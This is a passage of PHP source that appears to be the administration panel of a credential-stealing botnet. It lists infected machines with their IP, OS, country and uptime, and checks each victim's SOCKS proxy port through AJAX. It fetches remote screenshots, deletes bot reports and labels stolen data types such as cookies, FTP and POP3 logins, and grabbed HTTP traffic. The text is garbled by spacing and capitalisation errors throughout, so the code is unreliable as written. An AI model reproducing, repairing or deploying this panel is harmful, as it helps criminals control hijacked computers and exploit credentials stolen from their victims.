while (($ m = @ mysql_fetch_assoc ($ r))) $ res [$ m ['bot_id']] = $ m;
mysql_free_result ($ r); unset ($ m);
/ / Display the result.
$ E_count = 0;
$ Data ='';
if ($ bedit) $ data .= str_replace (array ('{NAME}', '{URL}', '{JS_EVENTS}'), array ('edit', QUERY_SCRIPT_HTML. '? botsaction ='. $ ba. ' & save = 1 ',''), THEME_FORMPOST_BEGIN);
$ Data .=
str_replace ('{WIDTH}', '90% ', THEME_DIALOG_BEGIN). str_replace (array ('{COLUMNS_COUNT}', '{TEXT}'), array (1, LNG_BA_FULLINFO_TITLE), THEME_DIALOG_TITLE).
THEME_DIALOG_ROW_BEGIN.
str_replace ('{COLUMNS_COUNT}', 1, THEME_DIALOG_ITEM_CHILD_BEGIN);
foreach ($ blist as $ bot)
{ $ Data .=
str_replace ('{WIDTH}', '100% ', THEME_LIST_BEGIN).
THEME_LIST_ROW_BEGIN. str_replace (array ('{WIDTH}', '{TEXT}'), array ('1% ', LNG_BA_FULLINFO_BOTID), THEME_LIST_ITEM_LTEXT_U1).
str_replace (array ('{WIDTH}', '{TEXT}'), array ('auto', BotPopupMenu ($ bot, 'botmenu')),
THEME_LIST_ITEM_LTEXT_U1). THEME_LIST_ROW_END;
/ / Background. $ Is_exists = isset ($ res [$ bot]);
if (! $ is_exists) $ data .= THEME_LIST_ROW_BEGIN.str_replace (array ('{COLUMNS_COUNT}', '{TEXT}'), array (2,
LNG_BA_FULLINFO_EMPTY), THEME_LIST_ITEM_EMPTY_1). THEME_LIST_ROW_END; else
{
$ E_count + +; $ L = $ res [$ bot];
$ Data .=
THEME_LIST_ROW_BEGIN. str_replace (array ('{WIDTH}', '{TEXT}'), array ('1% ', LNG_BA_FULLINFO_BOTNET),
THEME_LIST_ITEM_LTEXT_U2). str_replace (array ('{WIDTH}', '{TEXT}'), array ('auto', htmlentities_ex ($ l ['botnet'])), THEME_LIST_ITEM_LTEXT_U2).
THEME_LIST_ROW_END.
THEME_LIST_ROW_BEGIN. str_replace (array ('{WIDTH}', '{TEXT}'), array ('1% ', LNG_BA_FULLINFO_VERSION),
THEME_LIST_ITEM_LTEXT_U1).
str_replace (array ('{WIDTH}', '{TEXT}'), array ('auto', IntToVersion ($ l ['bot_version'])),
THEME_LIST_ITEM_LTEXT_U1).
THEME_LIST_ROW_END.
THEME_LIST_ROW_BEGIN. str_replace (array ('{WIDTH}', '{TEXT}'), array ('1% ', LNG_BA_FULLINFO_OS), THEME_LIST_ITEM_LTEXT_U2).
str_replace (array ('{WIDTH}', '{TEXT}'), array ('auto', OSDataToString ($ l ['os_version'])),
THEME_LIST_ITEM_LTEXT_U2). THEME_LIST_ROW_END.
THEME_LIST_ROW_BEGIN.
str_replace (array ('{WIDTH}', '{TEXT}'), array ('1% ', LNG_BA_FULLINFO_OSLANG), THEME_LIST_ITEM_LTEXT_U1).
str_replace (array ('{WIDTH}', '{TEXT}'), array ('auto', htmlentities_ex ($ l ['language_id'])),
THEME_LIST_ITEM_LTEXT_U1).
THEME_LIST_ROW_END.
THEME_LIST_ROW_BEGIN. str_replace (array ('{WIDTH}', '{TEXT}'), array ('1% ', LNG_BA_FULLINFO_TIMEBIAS),
THEME_LIST_ITEM_LTEXT_U2).
str_replace (array ('{WIDTH}', '{TEXT}'), array ('auto', TimeBiasToText ($ l ['time_localbias'])), THEME_LIST_ITEM_LTEXT_U2).
THEME_LIST_ROW_END.
THEME_LIST_ROW_BEGIN. str_replace (array ('{WIDTH}', '{TEXT}'), array ('1% ', LNG_BA_FULLINFO_COUNTRY),
THEME_LIST_ITEM_LTEXT_U1).
str_replace (array ('{WIDTH}', '{TEXT}'), array ('auto', htmlentities_ex ($ l ['country'])), THEME_LIST_ITEM_LTEXT_U1). THEME_LIST_ROW_END.
THEME_LIST_ROW_BEGIN.
str_replace (array ('{WIDTH}', '{TEXT}'), array ('1% ', LNG_BA_FULLINFO_IPV4), THEME_LIST_ITEM_LTEXT_U2). str_replace (array ('{WIDTH}', '{TEXT}'), array ('auto', htmlentities_ex ($ l ['ipv4']).($ l [' flag_nat ']?' * ':'') ),
THEME_LIST_ITEM_LTEXT_U2).
THEME_LIST_ROW_END. THEME_LIST_ROW_BEGIN.
str_replace (array ('{WIDTH}', '{TEXT}'), array ('1% ', LNG_BA_FULLINFO_LATENCY),
THEME_LIST_ITEM_LTEXT_U1).
str_replace (array ('{WIDTH}', '{TEXT}'), array ('auto', number_format_as_float ($ l ['net_latency'] / 1000, 3)),
THEME_LIST_ITEM_LTEXT_U1).
THEME_LIST_ROW_END. THEME_LIST_ROW_BEGIN.
str_replace (array ('{WIDTH}', '{TEXT}'), array ('1% ', LNG_BA_FULLINFO_PORT_S1),
THEME_LIST_ITEM_LTEXT_U2). str_replace (array ('{WIDTH}', '{TEXT}'), array ('auto', htmlentities_ex ($ l ['port_s1'])), THEME_LIST_ITEM_LTEXT_U2).
THEME_LIST_ROW_END.
THEME_LIST_ROW_BEGIN. str_replace (array ('{WIDTH}', '{TEXT}'), array ('1% ', LNG_BA_FULLINFO_TFIRST), THEME_LIST_ITEM_LTEXT_U1).
str_replace (array ('{WIDTH}', '{TEXT}'), array ('auto', htmlentities_ex (gmdate (LNG_FORMAT_DT, $ l ['rtime_first']))),
THEME_LIST_ITEM_LTEXT_U1). THEME_LIST_ROW_END.
THEME_LIST_ROW_BEGIN.
str_replace (array ('{WIDTH}', '{TEXT}'), array ('1% ', LNG_BA_FULLINFO_TLAST), THEME_LIST_ITEM_LTEXT_U2). str_replace (array ('{WIDTH}', '{TEXT}'), array ('auto', htmlentities_ex (gmdate (LNG_FORMAT_DT, $ l ['rtime_last']))),
THEME_LIST_ITEM_LTEXT_U2).
THEME_LIST_ROW_END. THEME_LIST_ROW_BEGIN.
str_replace (array ('{WIDTH}', '{TEXT}'), array ('1% ', LNG_BA_FULLINFO_TONLINE),
THEME_LIST_ITEM_LTEXT_U1). str_replace (array ('{WIDTH}', '{TEXT}'), array ('auto', $ l ['is_online'] == 1? TickCountToTime (CURRENT_TIME - $ l
['rtime_online']): LNG_FORMAT_NOTIME), THEME_LIST_ITEM_LTEXT_U1).
THEME_LIST_ROW_END. THEME_LIST_ROW_BEGIN.
str_replace (array ('{WIDTH}', '{TEXT}'), array ('1% ', LNG_BA_FULLINFO_INSTALL),
THEME_LIST_ITEM_LTEXT_U2). str_replace (array ('{WIDTH}', '{TEXT}'), array ('auto', $ l ['flag_install'] == 1? LNG_YES: LNG_NO),
THEME_LIST_ITEM_LTEXT_U2).
THEME_LIST_ROW_END. THEME_LIST_ROW_BEGIN.
str_replace (array ('{WIDTH}', '{TEXT}'), array ('1% ', LNG_BA_FULLINFO_USED), THEME_LIST_ITEM_LTEXT_U1). ($ Bedit
?
str_replace (array ('{NAME}', '{WIDTH}'), array ('used []', 'auto'), THEME_LIST_ITEM_LISTBOX_U1_BEGIN). str_replace (array ('{VALUE}', '{TEXT}'), array (0, LNG_NO), $ l ['flag_used']! = 1?
THEME_LIST_ITEM_LISTBOX_ITEM_CUR: THEME_LIST_ITEM_LISTBOX_ITEM).
str_replace (array ('{VALUE}', '{TEXT}'), array (1, LNG_YES), $ l ['flag_used'] == 1?
THEME_LIST_ITEM_LISTBOX_ITEM_CUR: THEME_LIST_ITEM_LISTBOX_ITEM).
(THEME_LIST_ITEM_LISTBOX_U1_END)
: str_replace (array ('{WIDTH}', '{TEXT}'), array ('auto', $ l ['flag_used'] == 1? LNG_YES: LNG_NO),
THEME_LIST_ITEM_LTEXT_U1)
). THEME_LIST_ROW_END.
THEME_LIST_ROW_BEGIN.
str_replace (array ('{WIDTH}', '{TEXT}'), array ('1% ', LNG_BA_FULLINFO_COMMENTS), THEME_LIST_ITEM_LTEXT_U2).
($ Bedit
?
str_replace (array ('{NAME}', '{VALUE}', '{MAX}', '{WIDTH}'), array ('comments []', htmlentities_ex ($ l ['comments']),
250, '99% '), THEME_LIST_ITEM_INPUT_TEXT_U2) :
str_replace (array ('{WIDTH}', '{TEXT}'), array ('auto', empty ($ l ['comments'])?' - ': htmlentities_ex ($ l [' comments'])),
THEME_LIST_ITEM_LTEXT_U2) ).
THEME_LIST_ROW_END;
if (strcmp ($ ba, 'fullinfoss') === 0)
{
$ Ss = str_replace ('{URL}', htmlentities_ex (QUERY_SCRIPT. '? botsaction = fullinfoss & bots [] = 0 & ipv4 ='. urlencode ($ l ['ipv4']).'& port
='. urlencode ($ l ['port_s1'])),
THEME_SCREENSHOT);
$ Data .=
THEME_LIST_ROW_BEGIN. str_replace (array ('{WIDTH}', '{TEXT}'), array ('1% ', LNG_BA_FULLINFO_SCREENSHOT),
THEME_LIST_ITEM_LTEXT_U1).
str_replace (array ('{WIDTH}', '{TEXT}'), array ('auto', $ ss), THEME_LIST_ITEM_LTEXT_U1).
THEME_LIST_ROW_END;
}
}
/ / Ending.
$ Data .= THEME_LIST_END.
($ Bedit & & $ is_exists? Str_replace (array ('{NAME}', '{VALUE}'), array ('bots []', htmlentities_ex ($ bot)),
THEME_FORM_VALUE):''). THEME_VSPACE;
}
$ Data .=
THEME_DIALOG_ITEM_CHILD_END.
THEME_DIALOG_ROW_END;
if ($ bedit & & $ e_count> 0)
{ $ Data .=
str_replace ('{COLUMNS_COUNT}', 1, THEME_DIALOG_ACTIONLIST_BEGIN).
str_replace (array ('{TEXT}', '{JS_EVENTS}'), array (LNG_BA_FULLINFO_ACTION_SAVE,''), THEME_DIALOG_ITEM_ACTION_SUBMIT).
THEME_DIALOG_ACTIONLIST_END;
}
$ Data .=
THEME_DIALOG_END. ($ Bedit? THEME_FORMPOST_END:'');
ThemeSmall (LNG_BA_FULLINFO_TITLE, $ data, 0, GetBotJSMenu ('botmenu'), 0); }
else if (strcmp ($ ba, 'today_dbreports') === 0 | | strcmp ($ ba, 'week_dbreports') === 0) {
$ Date2 = gmdate ('ymd', CURRENT_TIME);
$ Date1 = strcmp ($ ba, 'week_dbreports') === 0? gmdate ('ymd', CURRENT_TIME - 518400): $ date2;
foreach ($ blist as $ k => $ v) if (spacechars_exists ($ v)) $ blist [$ k] ='"'.$ v. '"';
header ('Location:'. QUERY_STRING_BLANK. 'reports_db & date1 ='. urlencode ($ date1). '& date2 ='. urlencode ($ date2). '&
bots ='. urlencode (implode ('', $ blist )).'& q = ');
die ();
} else if (strcmp ($ ba, 'files') === 0)
{
foreach ($ blist as $ k => $ v) if (spacechars_exists ($ v)) $ blist [$ k] ='"'.$ v. '"'; header ('Location:'. QUERY_STRING_BLANK. 'reports_files & bots ='. urlencode (implode ('', $ blist )).'& q = ');
die ();
} else if (strcmp ($ ba, 'remove') === 0 | | strcmp ($ ba, 'removeex') === 0) / / Check if the rights are not required, because checking
prishodit in the formation of $ _BOT_MENU.
{
if (isset ($ _GET ['yes']) | | isset ($ _GET ['no']))
{ $ Data =
str_replace ('{WIDTH}', 'auto', THEME_LIST_BEGIN).
str_replace (array ('{COLUMNS_COUNT}', '{TEXT}'), array (2, LNG_BA_REMOVE_TITLE), THEME_LIST_TITLE);
if (isset ($ _GET ['yes']))
{ / / Remove from botnet_list.
if (@ mysql_query ('DELETE FROM botnet_list WHERE'. $ sql_blist)) $ t = str_replace ('{TEXT}', sprintf
(LNG_BA_REMOVE_REMOVED, @ mysql_affected_rows ()), THEME_STRING_SUCCESS); else $ t = str_replace ('{TEXT}', mysql_error_ex (), THEME_STRING_ERROR);
$ Data .= THEME_LIST_ROW_BEGIN.
str_replace (array ('{WIDTH}', '{TEXT}'), array ('auto', 'botnet_list'), THEME_LIST_ITEM_LTEXT_U1).
str_replace (array ('{WIDTH}', '{TEXT}'), array ('auto', $ t), THEME_LIST_ITEM_LTEXT_U1). THEME_LIST_ROW_END;
/ / Remove.
if (strcmp ($ ba, 'removeex') === 0)
{
$ I = 1; $ Rlist = ListReportTables (MYSQL_DB);
/ / Remove from botnet_reports_ *. foreach ($ rlist as $ table)
{
if (@ mysql_query ("DELETE FROM {$ table} WHERE". $ sql_blist)) $ t = str_replace ('{TEXT}', sprintf (LNG_BA_REMOVE_REMOVED, @ mysql_affected_rows ()), THEME_STRING_SUCCESS);
else $ t = str_replace ('{TEXT}', mysql_error_ex (), THEME_STRING_ERROR);
$ Item = ($ i% 2? THEME_LIST_ITEM_LTEXT_U2: THEME_LIST_ITEM_LTEXT_U1);
$ Data .= THEME_LIST_ROW_BEGIN.
str_replace (array ('{WIDTH}', '{TEXT}'), array ('auto', htmlentities_ex ($ table)), $ item).
str_replace (array ('{WIDTH}', '{TEXT}'), array ('auto', $ t), $ item). THEME_LIST_ROW_END;
$ I + +; }
/ / Delete files. $ Root = getdirs (REPORTS_PATH);
if ($ root! == false) foreach ($ root as $ rdir)
{ $ Rdir = REPORTS_PATH .'/'.$ rdir;
$ Botnets = getdirs ($ rdir);
if ($ botnets! == false) foreach ($ botnets as $ botnet)
{ $ Botnet = $ rdir .'/'.$ botnet;
$ Bots = getdirs ($ botnet);
if ($ bots! == false) foreach ($ bots as $ bot)
{
$ Bot_l = mb_strtolower (urldecode ($ bot));
$ Bot = $ botnet .'/'.$ bot;
foreach ($ blist as $ l) {
if (strcmp ($ bot_l, mb_strtolower ($ l)) === 0)
{ if (ClearPath ($ bot)) $ t = str_replace ('{TEXT}', LNG_BA_REMOVE_FREMOVED, THEME_STRING_SUCCESS);
else $ t = str_replace ('{TEXT}', LNG_BA_REMOVE_FERROR, THEME_STRING_ERROR);
$ Item = ($ i% 2? THEME_LIST_ITEM_LTEXT_U2: THEME_LIST_ITEM_LTEXT_U1);
$ Data .=
THEME_LIST_ROW_BEGIN.
str_replace (array ('{WIDTH}', '{TEXT}'), array ('auto', htmlentities_ex ($ bot)), $ item). str_replace (array ('{WIDTH}', '{TEXT}'), array ('auto', $ t), $ item).
THEME_LIST_ROW_END;
$ I + +;
}
} }
unset ($ bots);
} unset ($ botnets);
}
unset ($ root); }
}
else $ data .= THEME_LIST_ROW_BEGIN.str_replace (array ('{WIDTH}', '{TEXT}'), array ('auto', LNG_BA_REMOVE_ABORTED), THEME_LIST_ITEM_LTEXT_U1). THEME_LIST_ROW_END;
ThemeSmall (LNG_BA_REMOVE_TITLE, $ data.THEME_LIST_END, 0, 0, 0);
}
else
{ $ Bl ='';
foreach ($ blist as $ bot) $ bl .= '& bots []='. addjsslashes (urlencode ($ bot));
$ Q = sprintf (strcmp ($ ba, 'remove') === 0? LNG_BA_REMOVE_Q1: LNG_BA_REMOVE_Q2, count ($ blist));
$ Js = "function qr () {var r = confirm ('". Addjsslashes ($ q )."')?' Yes ':' no '; window.location =' ". Addjsslashes
(QUERY_SCRIPT)."? Botsaction = {$ ba} {$ bl} & '+ r;} "; ThemeSmall (LNG_BA_REMOVE_TITLE,'', $ js, 0, 'onload = "qr ()"');
}
} else if (strcmp ($ ba, 'port_socks') === 0)
{
/ / Check if the socks. if (isset ($ _GET ['ipv4']) & & isset ($ _GET ['port']))
{
$ Ok = 0; if (($ s = @ fsockopen ($ _GET ['ipv4'], $ _GET ['port'], $ errn, $ errs, 5)))
{
@ Stream_set_timeout ($ s, 5); $ Data = pack ('CCSL', 4, 1, 0, 0). "\ 0" / / Header Socks4.
if (@ fwrite ($ s, $ data) & & ($ data = @ fread ($ s, 8)) & & strlen ($ data) == 8) $ ok = 1;
fclose ($ s); }
if ($ ok == 1) echo str_replace ('{TEXT}', LNG_BA_PORT_SOCKS_SUCCESS, THEME_STRING_SUCCESS); else echo str_replace ('{TEXT}', LNG_BA_PORT_SOCKS_FAILED, THEME_STRING_ERROR);
die (); }
/ / Display the list.
if (! ($ r = @ mysql_query ('SELECT bot_id, country, ipv4, port_s1 FROM botnet_list WHERE'. $ sql_blist))) ThemeMySQLError
();
/ / Get the result.
$ Res = array ();
while (($ m = @ mysql_fetch_row ($ r))) $ res [$ m [0]] = $ m;
mysql_free_result ($ r);
unset ($ m);
$ Data =
str_replace ('{WIDTH}', 'auto', THEME_LIST_BEGIN). str_replace (array ('{COLUMNS_COUNT}', '{TEXT}'), array (3, LNG_BA_PORT_SOCKS_TITLE), THEME_LIST_TITLE);
$ I = 0; $ Jslist ='';
/ / Display the result.
foreach ($ blist as $ bot)
{ $ Is_exists = isset ($ res [$ bot]);
$ Item = ((($ i + +)% 2 == 0)? THEME_LIST_ITEM_LTEXT_U1: THEME_LIST_ITEM_LTEXT_U2);
if ($ is_exists)
{
$ L = $ res [$ bot]; $ Jslist .= ($ jslist ==''?'': ',')."[' St {$ i}', '". Addjsslashes (urlencode ($ l [2 ]))."','" . addjsslashes (urlencode ($ l [3 ]))."']";
}
$ Data .=
THEME_LIST_ROW_BEGIN.
str_replace (array ('{WIDTH}', '{TEXT}'), array ('auto', BotPopupMenu ($ bot, 'botmenu'). '/'. ($ is_exists? $ l [1]: '- ')), $ item). str_replace (array ('{WIDTH}', '{TEXT}'), array ('150px ', $ is_exists? htmlentities_ex ($ l [2 ].':'.$ l [3]):'-:-' ), $ item).
str_replace (array ('{WIDTH}', '{TEXT}'), array ('150px ',
$ Is_exists? str_replace ('{ID}', 'st'. $ i, THEME_STRING_ID_BEGIN).
LNG_BA_PORT_SOCKS_CHECKING.THEME_STRING_ID_END:
LNG_BA_PORT_SOCKS_FAILED
), $ Item).
THEME_LIST_ROW_END;
}
/ / Script for checking proxies.
$ Ajax_err = addjsslashes (str_replace ('{TEXT}', LNG_BA_PORT_SOCKS_ERROR, THEME_STRING_ERROR)); $ Ajax_init = JSXMLHttpRequest ('sockshttp');
$ Q = addjsslashes (QUERY_SCRIPT. '? Botsaction = port_socks & bots [] = 0');
$ Ajax = <<<JS_SCRIPT
var sockslist = [{$ jslist}];
var sockshttp = false;
function StateChange (i) {if (sockshttp.readyState == 4)
{ var el = document.getElementById (sockslist [i] [0]);
if (sockshttp.status == 200 & & sockshttp.responseText.length> 5) el.innerHTML = sockshttp.responseText;
else el.innerHTML = '{$ ajax_err}'; SocksCheck (+ + i);
}}
function SocksCheck (i)
{
if (sockshttp) delete sockshttp; if (i <sockslist.length)
{
{$ Ajax_init} if (sockshttp)
{
sockshttp.onreadystatechange = function () {StateChange (i)}; sockshttp.open ('GET', '{$ q} & ipv4 =' + sockslist [i] [1] + '& port =' + sockslist [i] [2], true);
sockshttp.send (null); }
}
} JS_SCRIPT;
ThemeSmall (LNG_BA_PORT_SOCKS_TITLE, $ data.THEME_LIST_END, $ ajax, GetBotJSMenu ('botmenu'), 'onload =
"SocksCheck (0 );"');
}
else if (strcmp ($ ba, 'newscript') === 0) {
foreach ($ blist as $ k => $ v) if (spacechars_exists ($ v)) $ blist [$ k] ='"'.$ v. '"';
header ('Location:'. QUERY_STRING_BLANK. 'botnet_scripts & new =- 1 & bots ='. urlencode (implode ('', $ blist))); die ();
}
die ();
}
////////////////////////////////////////////////// /////////////////////////////
/ / Start the module. ////////////////////////////////////////////////// /////////////////////////////
/ / Select the name of the module and removing unnecessary menu items. $ Needed_module = (empty ($ _GET [QUERY_VAR_MODULE])?'': $ _GET [QUERY_VAR_MODULE]);
$ Curmodule ='';
OptimizeMenu ($ _MAINMENU, true);
foreach ($ _MAINMENU as $ key => $ item) if ($ item [0]! == 0 & & (strcmp ($ needed_module, $ item [0]) === 0 | | $ curmodule
=='')) $ curmodule = $ item [0]; if ($ curmodule =='') die ('Modules for current user not defined.');
define ('CURRENT_MODULE', $ curmodule); / / The current module. define ('FORM_CURRENT_MODULE', str_replace (array ('{NAME}', '{VALUE}'), array ('m', $ curmodule),
THEME_FORM_VALUE)); / / parameter of the current module for the form.
define ('QUERY_STRING', QUERY_STRING_BLANK.CURRENT_MODULE); / / query string for the current module. define ('QUERY_STRING_HTML', QUERY_STRING_BLANK_HTML.CURRENT_MODULE); / / query string for the current
module in HTML format.
unset ($ needed_module, $ curmodule);
/ / Load language module.
if (! file_exists ('system /'. CURRENT_MODULE. '. lng .'.$_ USER_DATA [' language'].'. php'))$_ USER_DATA ['language'] = DEFAULT_LANGUAGE;
require_once ('system /'. CURRENT_MODULE. '. lng .'.$_ USER_DATA [' language'].'. php ');
/ / Start the module.
require_once ('system /'. CURRENT_MODULE. '. php');
die ();
////////////////////////////////////////////////// /////////////////////////////
/ / Functions. ////////////////////////////////////////////////// /////////////////////////////
/ * Getting error with MySQL formotirovaniem HTML and prefix.
Return - string, the error MySQL. * /
function mysql_error_ex ()
{ return 'MySQL error:'. htmlentities_ex (mysql_error ());
}
/ *
Create a temporary file.
IN $ prefix - string, the prefix file.
Return - mixed, a new temporary file name, or false on failure. * /
function CreateTempFile ($ prefix) {
@ Mkdir ('tmp', 0777);
return @ tempnam ('tmp', $ prefix); }
/ *
Adding headers to load the data into a file.
IN $ name - string, the final file name. IN $ size - size of the file.
* /
function HTTPDownloadHeaders ($ name, $ size) {
header ('Content-Type: application / octet-stream');
header ('Content-Disposition: attachment; filename ='. basename_ex ($ name)); header ('Content-Transfer-Encoding: binary');
header ('Content-Length:'. $ size);
HTTPNoCacheHeaders ();
}
/ *
Converting BLT_ * to a string.
IN $ type - int, BLT_ * for the conversion.
Return - string, string representation BLT_ *. * /
function BltToLng ($ type)
{ switch ($ type)
{
case BLT_PROTECTED_STORAGE: return LNG_BLT_PROTECTED_STORAGE; case BLT_COOKIES_IE: return LNG_BLT_COOKIES_IE;
case BLT_FILE: return LNG_BLT_FILE;
case BLT_HTTP_REQUEST: return LNG_BLT_HTTP_REQUEST; case BLT_HTTPS_REQUEST: return LNG_BLT_HTTPS_REQUEST;
case BLT_LOGIN_FTP: return LNG_BLT_LOGIN_FTP;
case BLT_LOGIN_POP3: return LNG_BLT_LOGIN_POP3;
case BLT_GRABBED_UI: return LNG_BLT_GRABBED_UI;
case BLT_GRABBED_HTTP: return LNG_BLT_GRABBED_HTTP;
case BLT_GRABBED_WSOCKET: return LNG_BLT_GRABBED_WSOCKET; case BLT_GRABBED_FTPSOFTWARE: return LNG_BLT_GRABBED_FTPSOFTWARE;
case BLT_GRABBED_OTHER: return LNG_BLT_GRABBED_OTHER;
} return LNG_BLT_UNKNOWN;
}
/ *
Fnmatch substitute for Windows.
IN $ pattern - string, mask.
IN $ string - string, string.
Return - bool, true - in the case of coincidence, or else false.
* /
if (! function_exists ('fnmatch')) {
function fnmatch ($ pattern, $ string)
{ return @ preg_match ('#^'. strtr (preg_quote ($ pattern,'#'), array ('\ \ *' =>'.*', '\ \?' =>'.?')).' $ # i ', $ string);
}
}
/ *
Determines whether suschetvuet, whitespace in the string.
IN $ str - string, the string to check.
Return - true - if whitespace suschetvuet,
false - if the whitespace is not suschetvuet. * /
function spacechars_exists ($ str)
{ return strpbrk ($ str, "\ x20 \ x09 \ x0A \ x0B \ x0D") === false? false: true;
}
/ *
The transformation of a logical expression into an array.
IN $ exp - string, expression.
Return - array, the result. * /
function ExpToArray ($ exp)
{ $ List = array ();
$ Len = strlen ($ exp);
for ($ i = 0; $ i <$ len; $ i + +)
{ $ Cur = ord ($ exp [$ i]);
/ / Skip probelnye characters. if ($ cur == 0x20 | | ($ cur> = 0x9 & & $ cur <= 0xD)) continue;
/ / Check the quotes. if ($ cur == 0x22 | | $ cur == 0x27)
{
for ($ j = $ i + 1; $ j <$ len; $ j + +) if (ord ($ exp [$ j]) == $ cur) {
/ / Count the number of slashes.
$ C = 0; for ($ k = $ j - 1; ord ($ exp [$ k]) == 0x5C; $ k -) $ c + +;
if ($ c% 2 == 0) break; / / For an even number of slashes to quotes, our quotes are not special. symbol.
} if ($ j! = $ len) $ i + +; / / If we do not reach the end, first remove the quotes.
$ Type = 1;
}
/ / Simple copy to the first space.
else {
for ($ j = $ i + 1; $ j <$ len; $ j + +)
{ $ Cur = ord ($ exp [$ j]);
if ($ cur == 0x20 | | ($ cur> = 0x9 & & $ cur <= 0xD)) break;
}
$ Type = 0;
}
$ List [] = array (substr ($ exp, $ i, $ j - $ i), $ type);
$ I = $ j; }
return $ list; }
/ * Comparing strings with a logical expression.
IN $ str - string, string. IN $ exp - string, expression.
IN $ cs - bool, if true, the case-sensitive (BINARY), otherwise insensitive.
IN $ strong - bool, see the code.
Return - true - if the string is suitable for the expression
false - otherwise. * /
function MatchStringInExpString ($ str, $ exp, $ cs, $ strong)
{
$ Exp = trim ($ exp); if ($ exp ==''| | $ exp == '*') return true;
$ List = ExpToArray ($ exp);
/ / Setting pcre.
$ Pcre_pre = ($ strong? '# ^':'#'); $ Pcre_aft = ($ strong? '$ #':'#').($ Cs? 'U': 'iu');
/ / Obrabatyaem result. $ Q_prev = $ q_cur = 0;
$ RetVal = false;
foreach ($ list as $ item)
{
if ($ item [1] == 0)
{
$ Skip = 0; if (strcmp ($ item [0], 'OR') === 0) $ q_cur = 0;
else if (strcmp ($ item [0], 'AND') === 0) $ q_cur = 1;
else if (strcmp ($ item [0], 'NOT') === 0) $ q_cur = 2; else $ skip = 1;
if ($ skip == 0) {$ q_prev = $ q_cur; continue;}
}
/ / Compare.
$ R = preg_match ($ pcre_pre.strtr (preg_quote ($ item [0],'#'), array ('\ \ *' =>'.*', '\ \?' =>'.?')) . $ pcre_aft, $ str);
/ / Not sure of the logic.
switch ($ q_cur) {
case 0: / / OR
if ($ r> 0) $ retVal = true; break;
case 1: / / AND
if ($ r> 0) break;
return false;
case 2: / / NOT
if ($ r> 0) return false;
break; }
}
return $ retVal;
}
/ *
Converting a logical expression in the SQL query to WHERE.
IN $ exp - string, expression.
IN $ column - string, name of the column.
IN $ cs - bool, if true, sensitive, or insensitive. IN $ strong - bool, see the code.
Return - string, query. * /
function ExpToSQL ($ exp, $ column, $ cs, $ strong)
{ $ Exp = trim ($ exp);
if ($ exp ==''| | $ exp == '*') return'';
$ List = ExpToArray ($ exp);
/ / Obrabatyaem result. $ Query ='';
$ Q_addv = '';
foreach ($ list as $ item) {
if ($ item [1] == 0)
{
$ Skip = 0;
if (strcmp ($ item [0], 'OR') === 0) {$ q_cur = 'OR'; $ q_addv = '';}
else if (strcmp ($ item [0], 'AND') === 0) {$ q_cur = 'AND'; $ q_addv = '';} else if (strcmp ($ item [0], 'NOT') === 0) {$ q_cur = 'AND'; $ q_addv = 'NOT';}
else $ skip = 1;
if ($ skip == 0)
{
if ($ q_cur! = $ q_prev & &! empty ($ query)) $ query ='('.$ query .')'; $ Q_prev = $ q_cur;
continue;
}
}
$ S = str_replace (array ('%','_'), array ('\ \ \ \%', '\ \ \ \ _'), $ item [0]);
/ / Substitute Simola *,?. $ Len = strlen ($ s);
for ($ i = 0; $ i <$ len; $ i + +) if (($ c = ord ($ s [$ i])) == 0x2A | | $ c == 0x3F)
{ / / Count the number of slashes.
$ Cc = 0;
for ($ k = $ i - 1; $ k> = 0 & & ord ($ s [$ k]) == 0x5C; $ k -) $ cc + +;
/ / Substitute.
if ($ cc% 2 == 0) $ s [$ i] = $ c == 0x2A? '%': '_'; }
$ S = stripslashes ($ s); if (! $ strong) $ s ='%'.$ s. '%';
$ Query .= (empty ($ query)?'': $ Q_cur). $ Column. $ Q_addv. 'LIKE'. ($ Cs? 'BINARY':'').' \''. Addslashes ($ s). '\'';
}
return'('.$ query .')';
}
/ *
Checks whether the path of sound (otsutvie characters '\', '/', '\ 0').
IN $ str - string, the string to check.
Return - bool, true - if you let a secure, false - if the path is not safe.
* /
function SafePath ($ str) {
return (strpos ($ str, "/") === false & & strpos ($ str, "\ \") === false & & strpos ($ str, "\ 0") === false);
}
/ *
Conclusion login form.
IN $ show_error - bool, whether to display Your Message about incorrect username / password.
* / function ShowLoginForm ($ show_error)
{
$ Page = $ show_error? THEME_STRING_FORM_ERROR_1_BEGIN. 'Bad user name or password.'. THEME_STRING_FORM_ERROR_1_END:'';
$ Page .=
str_replace (array ('{NAME}', '{URL}', '{JS_EVENTS}'), array ('login', QUERY_STRING_BLANK_HTML. 'login',''), THEME_FORMPOST_BEGIN).
str_replace ('{WIDTH}', 'auto', THEME_DIALOG_BEGIN).
str_replace (array ('{COLUMNS_COUNT}', '{TEXT}'), array (2, 'Login'), THEME_DIALOG_TITLE). THEME_DIALOG_ROW_BEGIN.
str_replace ('{COLUMNS_COUNT}', 1, THEME_DIALOG_GROUP_BEGIN). THEME_DIALOG_ROW_BEGIN.
str_replace ('{TEXT}', 'User name:', THEME_DIALOG_ITEM_TEXT).
str_replace (array ('{VALUE}', '{NAME}', '{MAX}', '{WIDTH}'), array ('', 'user', '255 ', '200px'), THEME_DIALOG_ITEM_INPUT_TEXT).
THEME_DIALOG_ROW_END.
THEME_DIALOG_ROW_BEGIN.
str_replace ('{TEXT}', 'Password:', THEME_DIALOG_ITEM_TEXT).
str_replace (array ('{VALUE}', '{NAME}', '{MAX}', '{WIDTH}'), array ('', 'pass', '255 ', '200px'),
THEME_DIALOG_ITEM_INPUT_PASS). THEME_DIALOG_ROW_END.
THEME_DIALOG_ROW_BEGIN.
THEME_DIALOG_ITEM_EMPTY. str_replace (array ('{COLUMNS_COUNT}', '{VALUE}', '{NAME}', '{JS_EVENTS}', '{TEXT}'), array (1, 1, 'remember','',
'Remember (MD5 cookies) '), THEME_DIALOG_ITEM_INPUT_CHECKBOX_2).
THEME_DIALOG_ROW_END. THEME_DIALOG_GROUP_END.
THEME_DIALOG_ROW_END.
str_replace ('{COLUMNS_COUNT}', 2, THEME_DIALOG_ACTIONLIST_BEGIN).
str_replace (array ('{TEXT}', '{JS_EVENTS}'), array ('Submit',''), THEME_DIALOG_ITEM_ACTION_SUBMIT).
THEME_DIALOG_ACTIONLIST_END. THEME_DIALOG_END;
ThemeSmall ('login', $ page.THEME_FORMPOST_END, 0, 0, 0); }
/ * Create a list of available botnets in THEME_DIALOG_ITEM_LISTBOX.
IN $ current_botnet - string, name of the current botnet, or''if a botnet is not defined. IN $ adv_query - additional data in the HTTP-request for change of a botnet.
Return - string, ListBox named 'botnet' button and change the botnet. * /
